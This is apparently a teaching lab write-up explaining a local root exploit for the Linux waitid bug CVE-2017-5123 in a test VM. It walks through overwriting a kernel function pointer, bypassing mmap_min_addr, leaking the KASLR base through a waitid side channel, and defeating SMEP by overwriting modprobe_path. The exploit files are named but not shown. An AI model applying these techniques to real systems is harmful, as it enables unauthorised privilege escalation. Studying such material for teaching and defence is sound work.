A bug in the waitid
syscall (waitid
is a more general variant of waitpid
):
SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
infop, int, options, struct rusage __user *, ru)
{
struct rusage r;
struct waitid_info info = {.status = 0};
long err = kernel_waitid(which, upid, &info, options, ru ? &r : NULL);
int signo = 0;
if (err > 0) {
signo = SIGCHLD;
err = 0;
}
if (!err) {
if (ru && copy_to_user(ru, &r, sizeof(struct rusage)))
return -EFAULT;
}
if (!infop)
return err;
user_access_begin();
unsafe_put_user(signo, &infop->si_signo, Efault);
unsafe_put_user(0, &infop->si_errno, Efault);
unsafe_put_user((short)info.cause, &infop->si_code, Efault);
unsafe_put_user(info.pid, &infop->si_pid, Efault);
unsafe_put_user(info.uid, &infop->si_uid, Efault);
unsafe_put_user(info.status, &infop->si_status, Efault);
user_access_end();
return err;
Efault:
user_access_end();
return -EFAULT;
}
The patch that fixed it:
commit 96ca579a1ecc943b75beba58bebb0356f6cc4b51
Author: Kees Cook <keescook@chromium.org>
Date: Mon Oct 9 11:36:52 2017 -0700
waitid(): Add missing access_ok() checks
Adds missing access_ok() checks.
CVE-2017-5123
Reported-by: Chris Salls <chrissalls5@gmail.com>
Signed-off-by: Kees Cook <keescook@chromium.org>
Acked-by: Al Viro <viro@zeniv.linux.org.uk>
Fixes: 4c48abe91be0 ("waitid(): switch copyout of siginfo to unsafe_put_user()")
Cc: stable@kernel.org # 4.13
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
diff --git a/kernel/exit.c b/kernel/exit.c
index f2cd53e92147..cf28528842bc 100644
--- a/kernel/exit.c
+++ b/kernel/exit.c
@@ -1610,6 +1610,9 @@ SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
if (!infop)
return err;
+ if (!access_ok(VERIFY_WRITE, infop, sizeof(*infop)))
+ goto Efault;
+
user_access_begin();
unsafe_put_user(signo, &infop->si_signo, Efault);
unsafe_put_user(0, &infop->si_errno, Efault);
So basically, the code uses unsafe_put_user
to fill a struct siginfo
structure in userspace, but omits the call to access_ok
. This function verifies that a particular pointer has a value that belongs to user space.
Since the call is missing we can overwrite some kernel memory by passing a kernel space pointer to waitid
. Our goal is to do a privilege escalation exploit.
We have a qemu virtual machine that runs the vulnerable kernel.
The machine has 2 users: user:user
and root:root
. We want to login as user
and use the exploit to become root
.
For debugging purposes we pass the -s
parameter to qemu. This enables a gdbserver interface inside qemu, listening on port 1234. We then use the usual gdb to connect to this remote, thus being able to debug the entire system, including the kernel.
$ gdb -nx -x gdbinit
GNU gdb (Debian 8.3-1) 8.3
Copyright (C) 2019 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word".
(gdb) target remote:1234
Remote debugging using :1234
warning: No executable has been specified and target does not support
determining executable automatically. Try using the "file" command.
0xffffffff81959138 in ?? ()
=> 0xffffffff81959138: 65 44 8b 25 e8 0f 6b 7e mov r12d,DWORD PTR gs:[rip+0x7e6b0fe8] # 0xa128
(gdb) c
Continuing.
We can easily see that gdb has stopped somewhere inside the kernel, since addresses starting with ffffffff belong to kernel space.
In order to transfer files between the qemu vm and the host machine we’ll use the 9p filesystem. Qemu can take a directory from the host file system and use it as a 9p share that can be mounted from the guest vm.
In our case, we’ll use the vm/share
directory, which will be mounted on /mnt/share
inside the vm.
Host machine
adrians@snowgoose:~/cns/e2/vm/share$ touch file
adrians@snowgoose:~/cns/e2/vm/share$ ls -l
total 0
-rw-r--r-- 1 adrians adrians 0 Jan 1 21:46 file
adrians@snowgoose:~/cns/e2/vm/share$
QEMU machine
$ mount
/dev/root on / type ext4 (rw,relatime,data=ordered)
devtmpfs on /dev type devtmpfs (rw,relatime,size=119792k,nr_inodes=29948,mode=755)
proc on /proc type proc (rw,relatime)
devpts on /dev/pts type devpts (rw,relatime,gid=5,mode=620,ptmxmode=666)
tmpfs on /dev/shm type tmpfs (rw,relatime,mode=777)
tmpfs on /tmp type tmpfs (rw,relatime)
tmpfs on /run type tmpfs (rw,nosuid,nodev,relatime,mode=755)
sysfs on /sys type sysfs (rw,relatime)
share on /mnt/share type 9p (rw,sync,dirsync,relatime,access=clienttrans=virtio)
$ ls -l /mnt/share
total 0
-rw-r--r-- 1 user user 0 Jan 1 19:46 file
$
We can use the /proc/kallsyms
entry to quickly find out the address of a kernel symbol, to aid us in the reverse engineering process.
$ grep sys_waitid /proc/kallsyms
ffffffff8105a970 T sys_waitid
ffffffff8105abb0 T compat_sys_waitid
$
Let’s take a closer look to see what exactly can we write using this vulnerability.
The waitid
syscall is used by a parent process that wants to wait for a child process to terminate. It is more versatile that wait
and waitpid
, combining the functionality of both. It allows to to wait for any child process, or for some particular process identified by pid or by gid. Also, while wait
and waitpid
return the exit code of the child process, waitid
fills a struct siginfo
structure, which contains the exit code, but some other fields as well.
First, the siginfo
structure, defined in include/uapi/asm-generic/siginfo.h
:
typedef struct siginfo {
int si_signo;
int si_errno;
int si_code;
union {
int _pad[SI_PAD_SIZE];
/* kill() */
struct {
__kernel_pid_t _pid; /* sender's pid */
__ARCH_SI_UID_T _uid; /* sender's uid */
} _kill;
/* POSIX.1b timers */
struct {
__kernel_timer_t _tid; /* timer id */
int _overrun; /* overrun count */
char _pad[sizeof( __ARCH_SI_UID_T) - sizeof(int)];
sigval_t _sigval; /* same as below */
int _sys_private; /* not to be passed to user */
} _timer;
/* POSIX.1b signals */
struct {
__kernel_pid_t _pid; /* sender's pid */
__ARCH_SI_UID_T _uid; /* sender's uid */
sigval_t _sigval;
} _rt;
/* SIGCHLD */
struct {
__kernel_pid_t _pid; /* which child */
__ARCH_SI_UID_T _uid; /* sender's uid */
int _status; /* exit code */
__ARCH_SI_CLOCK_T _utime;
__ARCH_SI_CLOCK_T _stime;
} _sigchld;
/* SIGILL, SIGFPE, SIGSEGV, SIGBUS */
struct {
void __user *_addr; /* faulting insn/memory ref. */
#ifdef __ARCH_SI_TRAPNO
int _trapno; /* TRAP # which caused the signal */
#endif
short _addr_lsb; /* LSB of the reported address */
union {
/* used when si_code=SEGV_BNDERR */
struct {
void __user *_lower;
void __user *_upper;
} _addr_bnd;
/* used when si_code=SEGV_PKUERR */
__u32 _pkey;
};
} _sigfault;
/* SIGPOLL */
struct {
__ARCH_SI_BAND_T _band; /* POLL_IN, POLL_OUT, POLL_MSG */
int _fd;
} _sigpoll;
/* SIGSYS */
struct {
void __user *_call_addr; /* calling user insn */
int _syscall; /* triggering system call number */
unsigned int _arch; /* AUDIT_ARCH_* of syscall */
} _sigsys;
} _sifields;
}
Looks quite complicated, because it contains a lot of unions. But most of the fields aren’t actually used in our case. We can figure out the actual layout by inspecting the sys_waitid
source code and by disassembling/decompiling the kernel binary.
unsafe_put_user(signo, &infop->si_signo, Efault);
unsafe_put_user(0, &infop->si_errno, Efault);
unsafe_put_user((short)info.cause, &infop->si_code, Efault);
unsafe_put_user(info.pid, &infop->si_pid, Efault);
unsafe_put_user(info.uid, &infop->si_uid, Efault);
unsafe_put_user(info.status, &infop->si_status, Efault);
and
__int64 __fastcall sys_waitid(__int64 a1, __int64 a2, __int64 a3, __int64 a4, __int64 a5)
{
...
if ( v5 )
{
*(_DWORD *)v5 = v8;
*(_DWORD *)(v5 + 4) = 0;
*(_DWORD *)(v5 + 8) = HIDWORD(v10);
*(_QWORD *)(v5 + 16) = v9;
*(_DWORD *)(v5 + 24) = v10;
}
return result;
}
In summary, the layout looks something like this:
struct siginfo {
int si_signo; /* offset 0 */
int si_errno; /* offset 4 */
int si_code; /* offset 8 */
int _pad; /* offset 12 */
int pid; /* offset 16 */
int uid; /* offset 20 */
int status; /* offset 24 */
}
By inspecting the code and running some simple test cases we can distinguish 2 cases:
There isn’t any child process that has exited. In this case all the fields in the siginfo
structure will be set to 0
si_signo
will be set to SIGCHLD
(17)si_errno
will be set to 0si_code
will be set to CLD_EXITED
(1)pid
will be set to the pid of the child processuid
will be set to the uid of the child processstatus
will be set to the exit code of the child processWe see that we cannot control most of the values. We can control pid
, but its value is limited to 32768 (0x8000), and we can also control status
, but the exit code of a process is limited to 127.
We know that the kernel programming style uses a lot of function pointers. There are many structures that have function pointers inside: file_operations
, inode_operations
, etc.
If we can overwrite a function pointer with 0, we can make the kernel jump to address 0. Address 0 is not normally mapped, but we can use mmap to allocate memory at address 0 and fill it with the shellcode. Thus, we can make the kernel execute code that we control.
The problem is that many of these *_operations structures are in rodata.
const struct file_operations ext4_file_operations = {
.llseek = ext4_llseek,
.read_iter = ext4_file_read_iter,
.write_iter = ext4_file_write_iter,
...
Also, most of the kernel data structures are allocated on the heap, which makes it hard to find out their address.
We need to find a kernel function pointer which is in the .data section. A good candidate is:
int inet_recv_error(struct sock *sk, struct msghdr *msg, int len, int *addr_len)
{
if (sk->sk_family == AF_INET)
return ip_recv_error(sk, msg, len, addr_len);
#if IS_ENABLED(CONFIG_IPV6)
if (sk->sk_family == AF_INET6)
return pingv6_ops.ipv6_recv_error(sk, msg, len, addr_len);
#endif
return -EINVAL;
}
where pingv6_ops
is declared as
struct pingv6_ops pingv6_ops;
and has the type
struct pingv6_ops {
int (*ipv6_recv_error)(struct sock *sk, struct msghdr *msg, int len,
int *addr_len);
void (*ip6_datagram_recv_common_ctl)(struct sock *sk,
struct msghdr *msg,
struct sk_buff *skb);
void (*ip6_datagram_recv_specific_ctl)(struct sock *sk,
struct msghdr *msg,
struct sk_buff *skb);
int (*icmpv6_err_convert)(u8 type, u8 code, int *err);
void (*ipv6_icmp_error)(struct sock *sk, struct sk_buff *skb, int err,
__be16 port, u32 info, u8 *payload);
int (*ipv6_chk_addr)(struct net *net, const struct in6_addr *addr,
const struct net_device *dev, int strict);
};
So ipv6_recv_error
is a function pointer inside the pingv6_ops
structure, which is a global variable (in .data). We can double check by looking inside the kernel binary:
__int64 __fastcall inet_recv_error(__int64 a1)
{
__int16 v1; // r8
__int64 result; // rax
v1 = *(_WORD *)(a1 + 16);
if ( v1 == 2 )
return sub_FFFFFFFF817BA5D0();
result = 0xFFFFFFEALL;
if ( v1 == 10 )
result = qword_FFFFFFFF8212CC40();
return result;
}
We see that there is an indirect call from the qword at address 0xFFFFFFFF8212CC40, which is indeed in the .data section of the kernel.
Let’s see how inet_recv_error
is called:
int tcp_recvmsg(struct sock *sk, struct msghdr *msg, size_t len, int nonblock,
int flags, int *addr_len)
{
...
if (unlikely(flags & MSG_ERRQUEUE))
return inet_recv_error(sk, msg, len, addr_len);
tcp_recvmsg
is ultimately reached from the recv
syscall. So, if we call recv
on an ipv6 socket with the flag MSG_ERRQUEUE
, that code will be reached.
A simple exploit that will crash the kernel is in exploit_crash
. (run the vm with run.sh
) Another exploit that makes the kernel execute an int 3
instruction is in exploit_int3
. (run the vm with run.sh
)
We need a shellcode that changes the uid of the current task to 0 (root). Normally, the uid is in a cred
structure which is stored inside task_struct
.
struct task_struct {
...
/* Objective and real subjective task credentials (COW): */
const struct cred __rcu *real_cred;
/* Effective (overridable) subjective task credentials (COW): */
const struct cred __rcu *cred;
...
and
struct cred {
atomic_t usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
atomic_t subscribers; /* number of processes subscribed */
void *put_addr;
unsigned magic;
#define CRED_MAGIC 0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
kuid_t uid; /* real UID of the task */
kgid_t gid; /* real GID of the task */
kuid_t suid; /* saved UID of the task */
kgid_t sgid; /* saved GID of the task */
kuid_t euid; /* effective UID of the task */
kgid_t egid; /* effective GID of the task */
kuid_t fsuid; /* UID for VFS ops */
kgid_t fsgid; /* GID for VFS ops */
...
But the easiest way to change the uid of the current task to 0 is to call commit_creds(prepare_kernel_cred(NULL))
cred
structure with all the id’s set to 0cred
structure and install it for the current taskAn exploit with the complete shellcode is in exploit_mmap_zero
. (run the vm with run.sh
)
mmap_min_addr
is a setting in /proc - /proc/sys/vm/mmap_min_addr
. It specifies the minimum address that can be allocated via mmap. If this value is greater than 0, our previous exploit won’t work, since we can’t allocate memory at address 0 anymore.
run the vm with ./run_mmap_min.sh
and try the previous exploit:
$ /mnt/share/exploit_mmap_zero
mmap failed
To bypass this, we remember that waitid
can write some non-zero values as well, provided that our process has a child process that has exited.
We’ll use the fact that si_code
will be set to CLD_EXITED
(1) in order to overwrite pingv6_ops.ipv6_recv_error
with a non zero value.
si_errno
and si_code
are 4-byte values. If we consider them together as an 8-byte value, the value will be 0x100000000.
The exploit is in in exploit_mmap_non_zero
. (run the vm with run_mmap_min.sh
)
KASLR randomizes the kernel base address at every boot. This prevents us from knowing the address of pingv6_ops.ipv6_recv_error
in order to overwrite it.
Besides KASLR there’s also another setting called kptr_restrict
(/proc/sys/vm/kptr_restrict
). This setting forbids a regular user from seeing any kernel pointer that the kernel prints using printk. Otherwise it would be trivial to break KASLR by looking in /proc/kallsyms
.
When kptr_restrict
is enabled, all pointers will be seen as 0:
$ grep sys_waitid /proc/kallsyms
0000000000000000 T sys_waitid
0000000000000000 T compat_sys_waitid
To bypass KASLR we notice that the waitid
syscall has a side channel. If we provide an invalid address the syscall will fail with EFAULT
. Therefore, we can figure out the kernel base address by starting with 0xffffffff81000000
and incrementing the address until the waitid
doesn’t return EFAULT
.
There is a simple test program in exploit_kaslr
. Run the vm with ./run_kaslr.sh
.
Welcome to Buildroot
buildroot login: root
Password:
# grep _stext /proc/kallsyms
ffffffff90200000 T _stext
#
Welcome to Buildroot
buildroot login: user
Password:
$ /mnt/share/test_leak
kbase = ffffffff91000000
We obtain 0xffffffff91000000
, while the real value is 0xffffffff90200000
, a difference of 0xe00000
. This can be explained by looking at the output of readelf
on the kernel binary.
$ readelf -SW vmlinux
There are 30 section headers, starting at offset 0x1493140:
Section Headers:
[Nr] Name Type Address Off Size ES Flg Lk Inf Al
[ 0] NULL 0000000000000000 000000 000000 00 0 0 0
[ 1] .text PROGBITS ffffffff81000000 200000 95d9f7 00 AX 0 0 4096
[ 2] .notes NOTE ffffffff8195d9f8 b5d9f8 000024 00 A 0 0 4
[ 3] __ex_table PROGBITS ffffffff8195da20 b5da20 003390 00 A 0 0 4
[ 4] .rodata PROGBITS ffffffff81a00000 c00000 2a0016 00 WA 0 0 4096
[ 5] .pci_fixup PROGBITS ffffffff81ca0018 ea0018 003c30 00 A 0 0 8
[ 6] .tracedata PROGBITS ffffffff81ca3c48 ea3c48 000078 00 A 0 0 1
[ 7] __ksymtab PROGBITS ffffffff81ca3cc0 ea3cc0 015760 00 A 0 0 16
[ 8] __ksymtab_gpl PROGBITS ffffffff81cb9420 eb9420 011540 00 A 0 0 16
[ 9] __ksymtab_strings PROGBITS ffffffff81cca960 eca960 02fefb 00 A 0 0 1
[10] __param PROGBITS ffffffff81cfa860 efa860 0047e0 00 A 0 0 8
[11] __modver PROGBITS ffffffff81cff040 eff040 000fc0 00 A 0 0 8
[12] .data PROGBITS ffffffff81e00000 1000000 14b6c0 00 WA 0 0 4096
[13] __bug_table PROGBITS ffffffff81f4b6c0 114b6c0 015480 00 WA 0 0 1
[14] .vvar PROGBITS ffffffff81f61000 1161000 001000 00 WA 0 0 16
We see that .data
starts at ffffffff81e00000
. All the other sections before that are readonly. So, when trying to write to an address inside those sections, waitid
fails because of the permissions.
The full exploit is in exploit_kaslr
. Run the vm with ./run_kaslr.sh
.
SMEP - supervisor mode execution prevention - prevents the kernel from executing code from userspace pages
SMAP - supervisor mode access prevention - prevents the kernel from reading/writing data from/to userspace pages
So, our previous exploit doesn’t work anymore, since we are executing shellcode from userspace.
./run_smep.sh
$ /mnt/share/exploit_kaslr
kbase = 0xffffffff9ea00000
[ 15.348793] unable to execute userspace code (SMEP?) (uid: 1000)
[ 15.349062] BUG: unable to handle kernel paging request at 0000000100000000
[ 15.349751] IP: 0x100000000
We’ll have to use a so-called “data-oriented attack”.
There is a string called modprobe_path
in kernel/kmod.c
:
char modprobe_path[KMOD_PATH_LEN] = "/sbin/modprobe";
This is used by the function call_modprobe
:
static int call_modprobe(char *module_name, int wait)
{
struct subprocess_info *info;
static char *envp[] = {
"HOME=/",
"TERM=linux",
"PATH=/sbin:/usr/sbin:/bin:/usr/bin",
NULL
};
char **argv = kmalloc(sizeof(char *[5]), GFP_KERNEL);
if (!argv)
goto out;
module_name = kstrdup(module_name, GFP_KERNEL);
if (!module_name)
goto free_argv;
argv[0] = modprobe_path;
argv[1] = "-q";
argv[2] = "--";
argv[3] = module_name; /* check free_modprobe_argv() */
argv[4] = NULL;
info = call_usermodehelper_setup(modprobe_path, argv, envp, GFP_KERNEL,
NULL, free_modprobe_argv, NULL);
if (!info)
goto free_module_name;
return call_usermodehelper_exec(info, wait | UMH_KILLABLE);
free_module_name:
kfree(module_name);
free_argv:
kfree(argv);
out:
return -ENOMEM;
}
call_modprobe
in turn, is called from __request_module
. This basically allows loading kernel modules from inside the kernel. It does this by executing the binary specified in the modprobe_path
string.
One place where __request_module
is used is in search_binary_handler
in fs/exec.c
:
int search_binary_handler(struct linux_binprm *bprm)
{
...
if (need_retry) {
if (printable(bprm->buf[0]) && printable(bprm->buf[1]) &&
printable(bprm->buf[2]) && printable(bprm->buf[3]))
return retval;
if (request_module("binfmt-%04x", *(ushort *)(bprm->buf + 2)) < 0)
return retval;
need_retry = false;
goto retry;
}
return retval;
}
This is basically a feature that allows custom executable formats. If the first 4 bytes of an executable file are not printable, the kernel will turn 2 of them into an unsigned short, and then try to load a module called “binfmt-x”.
To exploit this, we will modify the string inside modprobe_path
to a file that we control. Then we create a dummy executable file which contains 4 bytes with a value greater than 0x80. Upon executing this file, the kernel will eventually reach __request_module
and will call our file with root privileges.
modprobe_path
We’ll have to use multiple calls to waitid
to overwrite modprobe_path
byte by byte. However, there is a small problem.
Let’s say we want to use the status
field, which we can control (it’s the exit code of the child process)
Because most of the bytes in the structure are 0, a subsequent use of waitid
will overwrite the previous bytes, thus making it hard to achieve a multi-byte write.
However, if we take a closer look, we have the fields _pad
and pid
which are close to each other. _pad
is unused and will be left as it is, and pid
is the pid of the child process, of which we can control 2 bytes.
In total, we can achieve a 6 byte write, like this:
We’ll thus be able to overwrite modprobe_path
with a value like tmp/AA
, which we can control.
The exploit is in ./exploit_smep
.